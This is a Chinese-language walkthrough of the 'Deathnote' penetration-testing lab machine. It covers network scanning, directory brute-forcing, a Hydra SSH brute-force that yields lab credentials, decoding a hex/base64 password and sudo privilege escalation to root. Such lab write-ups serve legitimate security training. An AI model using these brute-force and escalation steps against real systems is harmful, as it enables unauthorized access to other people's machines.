目录
简介
这个靶场属于常规靶场,没有太多弯弯绕绕,前期最基本的信息收集,找到用户名密码爆破,然后继续信息收集,然后使用sodu提权。这个靶场最大的效益就是给我们道理一些工具的使用。
攻击机kali:192.168.1.57
靶机:192.168.1.73
信息收集
0x01 主机发现
arp-scan -l
0x02 端口扫描
nmap -sV -T5 -p- -A 192.168.1.73
0x03 目录爆破
dirb http://192.168.1.73
0x04 访问rebots文件
fuck it my dad
added hint on /important.jpg
ryuk please delete it
发现其实这个东西并没什么用
这个时候我们需要去把域名和IP放在hosts文件中,做一个域名解析
cat /etc/hosts #linux中添加
C:\Windows\System32\drivers\etc #windows下的路径
添加
192.168.1.73 deathnote.vuln
访问解析后的域名
http://deathnote.vuln/
0x05 爆破域名
dirb http://deathnote.vuln/wordpress/
dirb http://deathnote.vuln/wordpress/wp-content/
发现一些有用的信息,
http://deathnote.vuln/robots.txt
http://deathnote.vuln/wordpress/wp-login.php
http://deathnote.vuln/wordpress/wp-login.php?redirect_to=http%3A%2F%2Fdeathnote.vuln%2Fwordpress%2Fwp-admin%2F&reauth=1
http://deathnote.vuln/wordpress/wp-login.php?registration=disabled
使用webscan扫描网站指纹
webscan 192.168.1.73
还在robot文件中发现一个图片,但是下载下来解析发现并没什么用,到这里我们其实漏掉一个关键性的目录
访问目录
这里我们发现两个txt文件,一个user,和一个note。我们下载下来,然后尝试使用hydra爆破,看看能不能爆破(其实这里就有两个思路,就是我们使用两个字典可以去爆破ssh,也可以去爆破网站的账号密码,爆破网站作者在这就帮你们尝试了一下,发现并不能)
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
0x06 爆破
hydra -L user.txt -P notes.txt 192.168.1.73 ssh
账号:l 密码:death4me
我们使用ssh连接成功
0x07 内网信息收集
尝试sudo提权
发现不能sudo提权,继续信息收集
ls -al
发现一个文件
cat user.txt
加密文件
解密:
i think u got the shell , but you wont be able to kill me -kira
解密工具:https://ctf.bugku.com/tool/brainfuck
继续信息收集,在/opt/L/fake-notebook-rule下发现两个文件,一个是使用方法,一个是一组16进制文件,我们开始解密
源码:
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
解密之后:
cGFzc3dkIDoga2lyYWlzZXZpbCA=
base64解码:
kiraisevil
解密工具:
https://www.sojson.com/hexadecimal.html #16进制转文本
发现一个密码,我们去/home文件夹下面看一下有没有其他用户,发现一个kira账号
尝试ssh连接
登入成功
提权
0x08 信息收集
查看kira.txt
发现并没有什么
尝试sudo提权
sudo -l #查看是否可以sudo提权
发现所有用户都可以提权,提权成功
sudo su
总结
涉及知识点:
1.信息收集
2.工具的使用:hydra,webscan
3.密文解密(常见的base64,md5都可以通过kali自带的工具解决)
4.sudo提权
收获:这个靶场主要还是考验我们信息收集能力,我们可以发现,并没有涉及漏洞利用的环节,单纯的去找用户名密码的信息,然后去使用ssh连接欸,寻找信息的过程中,也考验我们对工具的利用。